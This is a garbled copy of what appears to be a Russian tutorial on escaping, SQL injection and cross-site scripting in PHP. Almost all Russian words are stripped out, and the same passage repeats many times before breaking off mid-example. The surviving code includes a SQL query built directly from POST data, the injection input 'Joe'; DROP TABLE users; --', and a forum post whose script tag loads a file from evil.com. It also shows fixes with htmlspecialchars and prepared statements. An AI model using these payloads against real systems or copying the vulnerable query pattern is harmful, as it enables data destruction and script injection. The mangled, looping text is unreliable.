<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
-
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - "&
", .. : "&<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, .$_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-,. , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
-
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - "&
", .. : "&<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, .$_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-,. , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - "&
", .. : "&<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, .$_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
